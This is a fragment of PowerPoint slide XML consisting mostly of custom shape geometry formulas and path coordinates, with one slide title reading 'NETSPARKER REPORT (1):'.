              <a:gd name="connsiteY5" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 5346 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY16" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY17" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY18" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY19" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY20" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 6625 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 6337 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 5346 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY16" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY17" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY18" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY19" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 6337 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 5346 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY16" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY17" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY18" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 6337 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY16" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY17" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 6337 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY16" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9096 w 4106542"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 485 w 4106542"/>
              <a:gd name="connsiteY1" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 25728 w 4106542"/>
              <a:gd name="connsiteY2" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 46583 w 4106542"/>
              <a:gd name="connsiteY3" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 4068825 w 4106542"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 4102352 w 4106542"/>
              <a:gd name="connsiteY5" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 4102351 w 4106542"/>
              <a:gd name="connsiteY6" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 4068824 w 4106542"/>
              <a:gd name="connsiteY7" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4051317 w 4106542"/>
              <a:gd name="connsiteY8" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4051317 w 4106542"/>
              <a:gd name="connsiteY9" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 46569 w 4106542"/>
              <a:gd name="connsiteY10" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 9096 w 4106542"/>
              <a:gd name="connsiteY11" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 9096 w 4106542"/>
              <a:gd name="connsiteY12" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 9096 w 4106542"/>
              <a:gd name="connsiteY13" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 8611 w 4106057"/>
              <a:gd name="connsiteY0" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 4106057"/>
              <a:gd name="connsiteY1" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 25243 w 4106057"/>
              <a:gd name="connsiteY2" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 46098 w 4106057"/>
              <a:gd name="connsiteY3" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 4068340 w 4106057"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 4101867 w 4106057"/>
              <a:gd name="connsiteY5" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 4101866 w 4106057"/>
              <a:gd name="connsiteY6" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 4068339 w 4106057"/>
              <a:gd name="connsiteY7" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4050832 w 4106057"/>
              <a:gd name="connsiteY8" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4050832 w 4106057"/>
              <a:gd name="connsiteY9" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 46084 w 4106057"/>
              <a:gd name="connsiteY10" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 8611 w 4106057"/>
              <a:gd name="connsiteY11" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 8611 w 4106057"/>
              <a:gd name="connsiteY12" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 8611 w 4106057"/>
              <a:gd name="connsiteY0" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 4106057"/>
              <a:gd name="connsiteY1" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 25243 w 4106057"/>
              <a:gd name="connsiteY2" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 46098 w 4106057"/>
              <a:gd name="connsiteY3" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 4068340 w 4106057"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 4101867 w 4106057"/>
              <a:gd name="connsiteY5" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 4101866 w 4106057"/>
              <a:gd name="connsiteY6" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 4068339 w 4106057"/>
              <a:gd name="connsiteY7" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4050832 w 4106057"/>
              <a:gd name="connsiteY8" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4050832 w 4106057"/>
              <a:gd name="connsiteY9" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 46084 w 4106057"/>
              <a:gd name="connsiteY10" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 8611 w 4106057"/>
              <a:gd name="connsiteY11" fmla="*/ 10659953 h 10695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06057" h="10695515">
                <a:moveTo>
                  <a:pt x="8611" y="10659953"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5741" y="7120150"/>
                  <a:pt x="2870" y="3580346"/>
                  <a:pt x="0" y="40543"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8414" y="19945"/>
                  <a:pt x="10728" y="16628"/>
                  <a:pt x="25243" y="4670"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="46098" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4068340" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4086837" y="52"/>
                  <a:pt x="4101820" y="15032"/>
                  <a:pt x="4101867" y="33528"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4107455" y="1810541"/>
                  <a:pt x="4107454" y="8885083"/>
                  <a:pt x="4101866" y="10662081"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4101761" y="10680541"/>
                  <a:pt x="4086798" y="10695466"/>
                  <a:pt x="4068339" y="10695514"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4050832" y="10695514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4050832" y="10695515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46084" y="10695515"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="25394" y="10695403"/>
                  <a:pt x="8665" y="10679532"/>
                  <a:pt x="8611" y="10659953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9C63FCA-F4FF-4FD6-9DCF-5AD5835BCC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50258" y="651681"/>
            <a:ext cx="9691483" cy="50153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0E8D53-6D4B-4403-BBE7-78C16DF03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1527" y="4681971"/>
            <a:ext cx="8448517" cy="13496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110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3700"/>
              <a:t>NETSPARKER REPORT (1):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3700"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3700"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="904637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46471630-34CD-450E-B333-E697948643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0E1D602E-9706-47F7-A6A5-BA10295C8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03630" y="4300355"/>
            <a:ext cx="9288370" cy="2557645"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1834080 h 1858154"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1820983 h 1858154"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1745922 h 1858154"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1706043 h 1858154"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1696181 h 1858154"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1649683 h 1858154"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1598895 h 1858154"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1448852 h 1858154"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1327025 h 1858154"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1264472 h 1858154"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1217376 h 1858154"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1158396 h 1858154"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1076277 h 1858154"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1012022 h 1858154"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 956092 h 1858154"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 892073 h 1858154"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX20" fmla="*/ 2625728 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX21" fmla="*/ 2625728 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 234941 h 1858154"/>
              <a:gd name="connsiteX22" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 234941 h 1858154"/>
              <a:gd name="connsiteX23" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 304639 h 1858154"/>
              <a:gd name="connsiteX24" fmla="*/ 8582666 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 291389 h 1858154"/>
              <a:gd name="connsiteX25" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 155189 h 1858154"/>
              <a:gd name="connsiteX26" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 245 h 1858154"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1834080 h 1858154"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1820983 h 1858154"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1745922 h 1858154"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
